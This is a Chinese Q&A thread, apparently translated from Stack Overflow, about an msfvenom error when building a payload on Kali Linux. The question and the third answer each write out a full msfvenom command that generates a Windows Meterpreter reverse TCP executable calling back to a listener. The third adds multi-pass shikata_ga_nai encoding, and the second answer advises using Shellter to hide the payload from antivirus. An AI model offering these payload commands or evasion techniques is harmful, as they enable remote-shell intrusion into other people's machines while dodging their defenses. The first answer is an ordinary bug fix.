Kali Linux - MSFVenom有效负载创建错误

问题描述 投票:-1回答:3

所以我刚刚在戴尔Inspiron 5000系列,英特尔酷睿i5(第8代)上安装了Kali Linux Rolling!当我试图在MSFVenom中创建Windows反向TCP有效负载时,这是黑客操作系统附带的最佳有效负载创建工具之一,我遇到了一个错误。这是我输入的内容:

root@GetOffMyLawnBish:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

这就是我得到的:

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

有没有人知道这里发生了什么?请告诉我!

哦,顺便说一下,我已经创建了一个公共有效负载,这将是我的本地有效负载,但奇怪的是,公共的有没有问题,但是只要我将IPAddress更改为我的本地有效,它就会给出我错了:(。

linux windows metasploit
3个回答
1
投票

这是32位版本上发生的问题。如果对您无关紧要,请尝试使用64位版本。

如果你必须使用32位,那么你可以更改/usr/share/metasploit-framework/lib/msf/core/payload/android.rb文件(在第87行附近)

cert.not_after = cert.not_before + 3600*24*365*20 # 20 years

cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

请记住,这可能会影响Android有效负载的依赖性。


-1
投票

最简单的病毒扫描程序和本机Windows扫描程序即使使用编码器也能获取此负载并像疯狂一样引发红旗。

我建议您下载shellter并使用它来掩盖Windows将允许的可执行文件内的有效负载。几乎任何东西都可行。

此外,它只是使用数字多选有效载荷选择。

简单有效


-2
投票

您可以在命令下运行。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe > malicious file.exe

© www.soinside.com 2019 - 2024. All rights reserved.